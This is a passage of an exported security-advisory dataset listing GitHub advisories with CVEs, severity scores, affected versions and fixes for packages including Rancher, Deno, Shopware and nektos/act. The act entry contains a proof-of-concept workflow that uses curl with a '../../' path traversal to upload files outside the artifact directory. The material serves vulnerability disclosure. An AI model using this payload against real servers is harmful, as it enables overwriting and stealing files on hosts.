is able to address this issue. The name of the patch is c56639532a923d9a1600fb863ec7551b188b5d19. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217627.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'baobab'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4307'}, {'type': 'WEB', 'url': 'https://github.com/Yomguithereal/baobab/pull/511'}, {'type': 'WEB', 'url': 'https://github.com/Yomguithereal/baobab/commit/c56639532a923d9a1600fb863ec7551b188b5d19'}, {'type': 'PACKAGE', 'url': 'https://github.com/Yomguithereal/baobab'}, {'type': 'WEB', 'url': 'https://github.com/Yomguithereal/baobab/releases/tag/2.6.1'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.217627'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.217627'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T21:54:36Z', 'nvd_published_at': '2023-01-07T20:15:00Z'}" 1.4.0,GHSA-mc52-jpm2-cqh6,2023-04-03T19:15:49Z,2023-01-20T16:56:40Z,,['CVE-2023-22499'],Deno is vulnerable to race condition via interactive permission prompt spoofing,"### Impact Multi-threaded programs were able to spoof interactive permission prompt by rewriting the prompt to suggest that program is waiting on user confirmation to unrelated action. A malicious program could clear the terminal screen after permission prompt was shown and write a generic message like so: ``` // Expected prompt ⚠️ ┌ Deno requests read access to ""./log.txt"". ├ Requested by `Deno.open()` API ├ Run again with --allow-read to bypass this prompt. └ Allow? [y/n] (y = yes, allow; n = no, deny) > // Prompt that users would see Do you want to continue? ``` This situation impacts users who use Web Worker API and relied on interactive permission prompt. The reproduction is very timing sensitive and can’t be reliably reproduced on every try. This problem can not be exploited on systems that do not attach an interactive prompt (for example headless servers). ### Patches The problem has been fixed in Deno v1.29.3; it is recommended all users update to this version. ### Workarounds Run with `--no-prompt` flag to disable interactive permission prompts. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'deno'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.0'}, {'fixed': '1.29.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/denoland/deno/security/advisories/GHSA-mc52-jpm2-cqh6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22499'}, {'type': 'WEB', 'url': 'https://github.com/denoland/deno/pull/17392'}, {'type': 'PACKAGE', 'url': 'https://github.com/denoland/deno'}]","{'cwe_ids': ['CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T16:56:40Z', 'nvd_published_at': '2023-01-17T21:15:00Z'}" 1.4.0,GHSA-65v6-3c9m-hmrp,2023-02-02T10:32:45Z,2023-01-26T21:30:20Z,,['CVE-2022-47042'],Arbitrary file write in net.mingsoft:ms-mcms,MCMS v5.2.10 and below was discovered to contain an arbitrary file write vulnerability via the component ms/template/writeFileContent.do.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'net.mingsoft:ms-mcms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.10'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-47042'}, {'type': 'WEB', 'url': 'https://gitee.com/mingSoft/MCMS/issues/I6592F'}, {'type': 'PACKAGE', 'url': 'https://github.com/ming-soft/MCMS'}]","{'cwe_ids': ['CWE-434'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:05:28Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-h6w8-52mq-4qxc,2023-02-07T21:16:06Z,2023-01-31T12:30:24Z,,['CVE-2022-44645'],Apache Linkis contains Deserialization of Untrusted Data,"In Apache Linkis <=1.3.0 when used with the MySQL Connector/J, a deserialization vulnerability with possible remote code execution impact exists when an attacker has write access to a database and configures new datasource with a MySQL data source and malicious parameters. Therefore, the parameters in the jdbc url should be blacklisted. Versions of Apache Linkis <= 1.3.0 will be affected. We recommend users to upgrade the version of Linkis to version 1.3.1.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.linkis:linkis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-44645'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/linkis'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/zlcfmvt65blqc4n6fxypg6f0ns8fqfz4'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T00:09:05Z', 'nvd_published_at': '2023-01-31T10:15:00Z'}" 1.4.0,GHSA-79x5-cv79-49rj,2023-01-24T18:52:39Z,2023-01-16T12:30:18Z,,['CVE-2022-43718'],Apache Superset is vulnerable to Cross-Site Scripting (XSS) ,Upload data forms do not correctly render user input leading to possible XSS attack vectors that can be performed by authenticated users with database connection update permissions. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'versions': ['2.0.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-43718'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/superset'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/8615608jt2x7b3rmqrtngldy8pn3nz2r'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-19T12:09:02Z', 'nvd_published_at': '2023-01-16T11:15:00Z'}" 1.4.0,GHSA-829q-v5g8-hhxc,2023-01-20T23:02:02Z,2023-01-20T23:02:02Z,,[],CakePHP has incorrect Cross-Site Request Forgery validation,"CsrfComponent fails to invalidate requests that are missing both the CSRF token, and CSRF post data.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cakephp/cakephp/commit/522ed2f1fb49b00001c1ef8815a6feda790d61dd'}, {'type': 'WEB', 'url': 'https://bakery.cakephp.org/2015/05/07/cakephp_3_0_4_released.html'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/cakephp/cakephp/2015-05-07.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/cakephp/cakephp'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T23:02:02Z', 'nvd_published_at': None}" 1.4.0,GHSA-vq8w-x8v7-f88m,2023-01-11T20:54:28Z,2023-01-05T09:30:28Z,,['CVE-2019-25095'],LdapCherry Cross-site Scripting vulnerbaility,"A vulnerability, which was classified as problematic, was found in kakwa LdapCherry up to 0.x. Affected is an unknown function of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.0.0 is able to address this issue. The name of the patch is 6f98076281e9452fdb1adcd1bcbb70a6f968ade9. It is recommended to upgrade the affected component. VDB-217434 is the identifier assigned to this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ldapcherry'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25095'}, {'type': 'WEB', 'url': 'https://github.com/kakwa/ldapcherry/pull/16'}, {'type': 'WEB', 'url': 'https://github.com/kakwa/ldapcherry/commit/6f98076281e9452fdb1adcd1bcbb70a6f968ade9'}, {'type': 'PACKAGE', 'url': 'https://github.com/kakwa/ldapcherry'}, {'type': 'WEB', 'url': 'https://github.com/kakwa/ldapcherry/releases/tag/1.0.0'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.217434'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.217434'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T20:03:41Z', 'nvd_published_at': '2023-01-05T08:15:00Z'}" 1.4.0,GHSA-q95j-488q-5q3p,2023-01-09T20:05:31Z,2023-01-09T20:05:31Z,,[],Apiman Manager API affected by Jackson denial of service vulnerability,"### Impact Due to a vulnerability in `jackson-databind <= 2.12.6.0`, an authenticated attacker could craft an Apiman policy configuration which, when saved, may cause a denial of service on the Apiman Manager API. This does **not** affect the Apiman Gateway. ### Patches Upgrade to Apiman 3.0.0.Final or later. If you are using an older version of Apiman and need to remain on that version, contact your Apiman [support provider](https://www.apiman.io/support.html) for advice/long-term support. ### Workarounds If all users of the Apiman Manager are trusted then you may assess this is low risk, as an account is required to exploit the vulnerability. ### References * Apiman maintainer and security contact: marc@blackparrotlabs.io * https://nvd.nist.gov/vuln/detail/CVE-2020-36518 * https://github.com/FasterXML/jackson-databind/issues/2816","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.apiman:apiman-manager-api-impl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.2.3.Final'}}]","[{'type': 'WEB', 'url': 'https://github.com/apiman/apiman/security/advisories/GHSA-q95j-488q-5q3p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36518'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2816'}, {'type': 'PACKAGE', 'url': 'https://github.com/apiman/apiman'}]","{'cwe_ids': ['CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T20:05:31Z', 'nvd_published_at': None}" 1.4.0,GHSA-7cp7-jfp6-jh4f,2023-01-25T17:57:42Z,2023-01-20T17:33:54Z,,['CVE-2023-22733'],Shopware's log module vulnerable to Improper Output Neutralization,"### Impact The log module contains all kind of sent mails. It is possible to see the password reset email of customers and admin users to gain probably more access. ### Patches Update to the latest 6.4.18.1 version. ### Workarounds - For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. - Remove from all users the log module ACL rights - [Disable logging](https://developer.shopware.com/docs/guides/hosting/performance/performance-tweaks#logging) ### References https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-01-2023?category=security-updates ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.18.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.18.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.18.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.18.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-7cp7-jfp6-jh4f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22733'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/commit/407a83063d7141c1a626441799c3ebef79498c07'}, {'type': 'WEB', 'url': 'https://developer.shopware.com/docs/guides/hosting/performance/performance-tweaks#logging'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-01-2023?category=security-updates'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/platform'}]","{'cwe_ids': ['CWE-117', 'CWE-532'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T17:33:54Z', 'nvd_published_at': '2023-01-17T22:15:00Z'}" 1.4.0,GHSA-cq4p-vp5q-4522,2023-02-15T18:40:09Z,2023-01-25T19:36:57Z,,['CVE-2022-43757'],Plaintext storage of sensitive data in Rancher API and cluster.management.cattle.io objects,"### Impact This issue affects Rancher versions from 2.5.0 up to and including 2.5.16, from 2.6.0 up to and including 2.6.9 and 2.7.0. It was discovered that the security advisory CVE-2021-36782 (GHSA-g7j7-h4q8-8w2f), previously released by Rancher, missed addressing some sensitive fields, secret tokens, encryption keys, and SSH keys that were still being stored in plaintext directly on Kubernetes objects like `Clusters`. The exposed credentials are visible in Rancher to authenticated `Cluster Owners`, `Cluster Members`, `Project Owners` and `Project Members` of that cluster on the endpoints: - `/v1/management.cattle.io.cluster` - `/v1/management.cattle.io.clustertemplaterevisions` The remaining sensitive fields are now stripped from `Clusters` and other objects and moved to a `Secret` before the object is stored. The `Secret` is retrieved when the credential is needed. For objects that existed before this security fix, a one-time migration happens on startup. The fields that have been addressed by this security fix are: - `Cluster.Spec.RancherKubernetesEngineConfig.Services.KubeAPI.SecretsEncryptionConfig.CustomConfig.Providers[].AESGCM.Keys[].Secret` - `Cluster.Spec.RancherKubernetesEngineConfig.Services.KubeAPI.SecretsEncryptionConfig.CustomConfig.Providers[].AESCBC.Keys[].Secret` - `Cluster.Spec.RancherKubernetesEngineConfig.Services.KubeAPI.SecretsEncryptionConfig.CustomConfig.Providers[].SecretboxConfiguration.Keys[].Secret` - `Cluster.Spec.RancherKubernetesEngineConfig.Services.Kubelet.ExtraEnv` when containing the `AWS_SECRET_ACCESS_KEY` environment variable - `Cluster.Spec.RancherKubernetesEngineConfig.BastionHost.SSHKey` - `Cluster.Spec.RancherKubernetesEngineConfig.PrivateRegistries[].ECRCredentialPlugin.AwsSecretAccessKey` - `Cluster.Spec.RancherKubernetesEngineConfig.PrivateRegistries[].ECRCredentialPlugin.AwsSessionToken` - `Cluster.Spec.RancherKubernetesEngineConfig.Network.AciNetworkProvider.ApicUserKey` - `Cluster.Spec.RancherKubernetesEngineConfig.Network.AciNetworkProvider.KafkaClientKey` - `Cluster.Spec.RancherKubernetesEngineConfig.Network.AciNetworkProvider.Token` **Important:** - For the exposure of credentials not related to Rancher, the final impact severity for confidentiality, integrity and availability is dependent on the permissions the leaked credentials have on their services. - It is recommended to review for potentially leaked credentials in this scenario and to change them if deemed necessary. ### Workarounds There is no direct mitigation besides updating Rancher to a patched version. ### Patches Patched versions include releases 2.5.17, 2.6.10, 2.7.1 and later versions. After upgrading to a patched version, it is important to check for the `ACISecretsMigrated` and `RKESecretsMigrated` conditions on `Clusters` and `ClusterTemplateRevisions` to confirm when secrets have been fully migrated off of those objects, and the objects scoped within them. ### For more information If you have any questions or comments about this advisory: * Reach out to [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries. * Open an issue in [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository. * Verify our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.17'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.10'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rancher/rancher/security/advisories/GHSA-cq4p-vp5q-4522'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-43757'}, {'type': 'WEB', 'url': 'https://bugzilla.suse.com/show_bug.cgi?id=1205295'}, {'type': 'PACKAGE', 'url': 'https://github.com/rancher/rancher'}]","{'cwe_ids': ['CWE-200', 'CWE-256', 'CWE-312'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-25T19:36:57Z', 'nvd_published_at': '2023-02-07T13:15:00Z'}" 1.4.0,GHSA-pf38-5p22-x6h6,2023-01-25T22:03:48Z,2023-01-14T03:30:21Z,,['CVE-2023-0297'],Code Injection in pyload-ng,Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pyload-ng'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0b3.dev31'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0297'}, {'type': 'WEB', 'url': 'https://github.com/pyload/pyload/commit/7d73ba7919e594d783b3411d7ddb87885aea782d'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/171096/pyLoad-js2py-Python-Execution.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/172914/PyLoad-0.5.0-Remote-Code-Execution.html'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-25T22:03:48Z', 'nvd_published_at': '2023-01-14T03:15:00Z'}" 1.4.0,GHSA-pc99-qmg4-rcff,2023-02-03T20:47:31Z,2023-01-20T16:00:36Z,,['CVE-2023-22726'],act vulnerable to arbitrary file upload in artifact server,"### Impact The artifact server that stores artifacts from Github Action runs does not sanitize path inputs. This allows an attacker to download and overwrite arbitrary files on the host from a Github Action. This issue may lead to privilege escalation. #### Issue 1: Arbitrary file upload in artifact server (GHSL-2023-004) The [/upload endpoint](https://github.com/nektos/act/blob/v0.2.35/pkg/artifacts/server.go#LL103C2-L103C2) is vulnerable to path traversal as filepath is user controlled, and ultimately flows into os.Mkdir and os.Open. ``` router.PUT(""/upload/:runId"", func(w http.ResponseWriter, req *http.Request, params httprouter.Params) { itemPath := req.URL.Query().Get(""itemPath"") runID := params.ByName(""runId"") if req.Header.Get(""Content-Encoding"") == ""gzip"" { itemPath += gzipExtension } filePath := fmt.Sprintf(""%s/%s"", runID, itemPath) ``` #### Issue 2: Arbitrary file download in artifact server (GHSL-2023-004) The [/artifact endpoint](https://github.com/nektos/act/blob/v0.2.35/pkg/artifacts/server.go#L245) is vulnerable to path traversal as the path is variable is user controlled, and the specified file is ultimately returned by the server. ``` router.GET(""/artifact/*path"", func(w http.ResponseWriter, req *http.Request, params httprouter.Params) { path := params.ByName(""path"")[1:] file, err := fsys.Open(path) ``` #### Proof of Concept Below I have written a Github Action that will upload secret.txt into the folder above the specified artifact directory. The first call to curl will create the directory named 1 if it does not already exist, and the second call to curl will upload the secret.txt file to the directory above the specified artifact directory. When testing this POC, the `--artifact-server-path` parameter must be passed to act in order to enable the artifact server. Replace yourIPandPort with the IP and port of the server. An attacker can enumerate /proc/net/tcp in order to find the artifact server IP and port, but this is out of the scope of this report. Please let me know if you would like a copy of this script. ``` name: CI on: push jobs: test: runs-on: ubuntu-latest steps: - run: echo ""Here are some secrets"" > secret.txt - run: curl http:///upload/1?itemPath=secret.txt --upload-file secret.txt - run: curl http:///upload/1?itemPath=../../secret.txt --upload-file secret.txt ``` ### Remediation 1. During implementation of [Open and OpenAtEnd for FS](https://github.com/nektos/act/blob/master/pkg/artifacts/server.go#L65), please ensure to use ValidPath() to check against path traversal. See more here: https://pkg.go.dev/io/fs#FS 2. Clean the user-provided paths manually ### Patches Version 0.2.40 contains a patch. ### Workarounds Avoid use of artifact server with `--artifact-server-path`","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/nektos/act'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.40'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.2.39'}}]","[{'type': 'WEB', 'url': 'https://github.com/nektos/act/security/advisories/GHSA-pc99-qmg4-rcff'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22726'}, {'type': 'WEB', 'url': 'https://github.com/nektos/act/issues/1553'}, {'type': 'WEB', 'url': 'https://github.com/nektos/act/commit/63ae215071f94569d910964bdee866d91d6e3a10'}, {'type': 'PACKAGE', 'url': 'https://github.com/nektos/act'}, {'type': 'WEB', 'url': 'https://github.com/nektos/act/blob/master/pkg/artifacts/server.go#L65'}, {'type': 'WEB', 'url': 'https://github.com/nektos/act/blob/v0.2.35/pkg/artifacts/server.go#L245'}, {'type': 'WEB', 'url': 'https://github.com/nektos/act/blob/v0.2.35/pkg/artifacts/server.go#LL103C2-L103C2'}, {'type': 'WEB', 'url': 'https://github.com/nektos/act/releases/tag/v0.2.40'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2023-004_act/'}]","{'cwe_ids': ['CWE-22', 'CWE-434'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T16:00:36Z', 'nvd_published_at': '2023-01-20T22:15:00Z'}" 1.4.0,GHSA-8c69-r38j-rpfj,2023-02-07T15:48:39Z,2023-01-25T19:31:08Z,,['CVE-2022-43755'],Rancher cattle-token is predictable,"### Impact An issue was discovered in Rancher versions up to and including 2.6.9 and 2.7.0, where the `cattle-token` secret, used by the `cattle-cluster-agent`, is predictable. Even after the token is regenerated, it will have the same value. This issue is not present in Rancher 2.5 releases. The `cattle-token` is used by Rancher's `cattle-cluster-agent` to connect to the Kubernetes API of Rancher provisioned downstream clusters. The problem occurs because the `cattle-token` secret does not use any random value in its composition, which causes it to always be regenerated with the same value. This can pose a serious problem if the token is compromised and needs to be recreated for security purposes. The usage of the `cattle-token` by an unauthorized user allows to escalate privileges to the cluster owner of the affected downstream cluster. It does not allow access to Rancher's own local cluster (the cluster where Rancher is provisioned). ### Workarounds In case it is not possible to promptly update to a patched version, a workaround is to use the [rotate script](https://github.com/rancherlabs/support-tools/tree/master/rotate-tokens) provided in the public security advisory [CVE-2021-36782 / GHSA-g7j7-h4q8-8w2f](https://github.com/rancher/rancher/security/advisories/GHSA-g7j7-h4q8-8w2f), which facilitates the rotation and creation of a new unique downstream cluster token. ### Patches Patched versions include releases 2.6.10, 2.7.1 and later versions. After upgrading to one of the patched versions, it is highly recommended to rotate the `cattle-token` in downstream clusters to guarantee that a new random token will be safely regenerated. The procedure below can rotate the `cattle-token` and should be executed in each downstream cluster provisioned by Rancher. It is recommended to first test this process in an appropriate development/testing environment. ```shell # Verify the current secret before rotating it $ kubectl describe secrets cattle-token -n cattle-system # Delete the secret $ kubectl delete secrets cattle-token -n cattle-system # Restart the cattle-cluster-agent deployment $ kubectl rollout restart deployment/cattle-cluster-agent -n cattle-system # Confirm that a new and different secret was generated $ kubectl describe secrets cattle-token -n cattle-system ``` ### For more information If you have any questions or comments about this advisory: * Reach out to [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries. * Open an issue in [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository. * Verify our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.10'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rancher/rancher/security/advisories/GHSA-8c69-r38j-rpfj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-43755'}, {'type': 'WEB', 'url': 'https://bugzilla.suse.com/show_bug.cgi?id=1205297'}, {'type': 'PACKAGE', 'url': 'https://github.com/rancher/rancher'}]","{'cwe_ids': ['CWE-330', 'CWE-331'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-25T19:31:08Z', 'nvd_published_at': '2023-02-07T13:15:00Z'}" 1.4.0,GHSA-c9q3-r4rv-mjm7,2023-02-06T16:46:16Z,2023-01-27T00:54:46Z,,['CVE-2021-39217'],Fix for arbitrary command execution in custom layout update through blocks,"### Impact Custom Layout enabled admin users to execute arbitrary commands via block methods. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '19.4.22'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '20.0.0'}, {'fixed': '20.0.19'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/security/advisories/GHSA-c9q3-r4rv-mjm7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39217'}, {'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/commit/289bd4b4f53622138e3e5c2d2cef7502d780086f'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenMage/magento-lts'}, {'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22'}, {'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T00:54:46Z', 'nvd_published_at': '2023-01-27T18:15:00Z'}" 1.4.0,GHSA-3xh5-8hvq-rc8x,2023-01-10T21:45:06Z,2023-01-04T15:30:19Z,,['CVE-2022-45875'],Apache DolphinScheduler vulnerable to Improper Input Validation,Apache DolphinScheduler improperly validates script alert plugin parameters and is vulnerable to remote command execution. This issue affects Apache DolphinScheduler version 3.0.1 and prior versions; version 3.1.0 and prior versions. Users should upgrade to version 3.0.2 or 3.1.1.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.dolphinscheduler:dolphinscheduler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.dolphinscheduler:dolphinscheduler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.1.1'}]}], 'versions': ['3.1.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-45875'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/dolphinscheduler'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/r0wqzkjsoq17j6ww381kmpx3jjp9hb6r'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-06T21:35:26Z', 'nvd_published_at': '2023-01-04T15:15:00Z'}" 1.4.0,GHSA-m95x-m25c-w9mp,2023-01-11T23:54:47Z,2023-01-11T23:54:47Z,,[],XML-RPC for PHP allows access to local files via malicious argument to the Client::send method,"Abusing the `$method` argument of Client::send, it was possible to force the client to _access local files_ or _connect to undesired urls_ instead of the intended target server's url (the one used in the Client constructor). This weakness only affects installations where all the following conditions apply, at the same time: - the xmlrpc Client is used, ie. not xmlrpc servers - untrusted data (eg. data from remote users) is used as value for the `$method` argument 